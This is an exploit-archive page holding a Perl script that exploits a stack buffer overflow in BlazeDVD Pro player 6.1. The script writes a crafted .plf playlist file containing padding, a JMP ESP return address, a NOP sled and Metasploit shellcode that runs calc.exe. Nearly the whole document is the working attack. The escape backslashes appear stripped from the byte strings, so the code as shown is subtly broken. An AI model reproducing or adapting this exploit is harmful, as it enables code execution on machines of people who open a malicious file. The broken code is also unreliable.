[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : BlazeDVD Pro player 6.1 - Stack Based Buffer Overflow (Direct Ret)
# Published : 2013-07-16
# Author :
# Previous Title : Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation
# Next Title : Adrenalin Player 2.2.5.3 (.wvx) - SEH Buffer Overflow


#!/usr/bin/perl

# BlazeDVD Pro player 6.1  Local stack based buffer overflow
# Author: PuN1sh3r
# Email: luiguibiker@gmail.com
# Date: Mon Jul 15 03:01:37 EDT 2013
# Vendor link: http://www.blazevideo.com/download.htmm
# Software Link: http://www.blazevideo.com/download.php?product=BlazeDVDPro
# App Version: 6.1
# Tested on: Windows 2003 server sp1(EN)
# special thanks to corelanc0d3r for his amazing tutorials


$file = "blazeExpl.plf";
$junk = "x41" x 260;
$eip = "x33xFExE4x77"; #jmp ESP on kernel32.dll

#msf win/exec calc.exe [*] x86/alpha_mixed 
$shellcode = "x89xe7xdaxd4xd9x77xf4x5bx53x59x49x49x49x49" .
"x49x49x49x49x49x49x43x43x43x43x43x43x37x51" .
"x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" .
"x41x42x32x42x42x30x42x42x41x42x58x50x38x41" .
"x42x75x4ax49x49x6cx78x68x4dx59x67x70x77x70" .
"x43x30x65x30x6bx39x5ax45x76x51x59x42x52x44" .
"x6ex6bx71x42x46x50x6ex6bx56x32x36x6cx4ex6b" .
"x53x62x66x74x6cx4bx33x42x36x48x34x4fx6fx47" .
"x51x5ax75x76x75x61x39x6fx45x61x79x50x6cx6c" .
"x67x4cx70x61x53x4cx66x62x36x4cx57x50x5ax61" .
"x7ax6fx46x6dx63x31x5ax67x4ax42x4ax50x72x72" .
"x33x67x6cx4bx76x32x76x70x6cx4bx53x72x35x6c" .
"x46x61x4ax70x6ex6bx31x50x50x78x6bx35x39x50" .
"x54x34x62x6ax67x71x4ex30x30x50x6cx4bx52x68" .
"x35x48x6ex6bx70x58x51x30x43x31x6ax73x5ax43" .
"x55x6cx43x79x6cx4bx37x44x4cx4bx37x71x69x46" .
"x36x51x39x6fx46x51x4fx30x4ex4cx4fx31x5ax6f" .
"x64x4dx37x71x5ax67x46x58x79x70x43x45x4bx44" .
"x77x73x31x6dx4bx48x47x4bx51x6dx46x44x50x75" .
"x39x72x30x58x6cx4bx53x68x75x74x35x51x59x43" .
"x65x36x6cx4bx36x6cx52x6bx6ex6bx42x78x47x6c" .
"x63x31x48x53x6ex6bx63x34x4ex6bx56x61x7ax70" .
"x6cx49x73x74x34x64x56x44x63x6bx53x6bx43x51" .
"x61x49x43x6ax66x31x4bx4fx4bx50x31x48x71x4f" .
"x33x6ax6cx4bx32x32x48x6bx6ex66x31x4dx51x7a" .
"x76x61x6cx4dx6ex65x4fx49x37x70x67x70x63x30" .
"x72x70x70x68x44x71x4ex6bx32x4fx6bx37x39x6f" .
"x38x55x4fx4bx7ax50x6dx65x6cx62x70x56x55x38" .
"x6fx56x4dx45x6dx6dx6fx6dx39x6fx4bx65x55x6c" .
"x74x46x63x4cx55x5ax6dx50x49x6bx6bx50x64x35" .
"x67x75x6fx4bx72x67x57x63x71x62x62x4fx30x6a" .
"x57x70x36x33x69x6fx68x55x73x53x61x71x72x4c" .
"x30x63x44x6ex70x65x32x58x32x45x65x50x41x41";
$junk .= $eip . "x90" x 50 . $shellcode ;
###############################################################
open(FILE,">$file");
print FILE $junk;
close(FILE);
###############################################################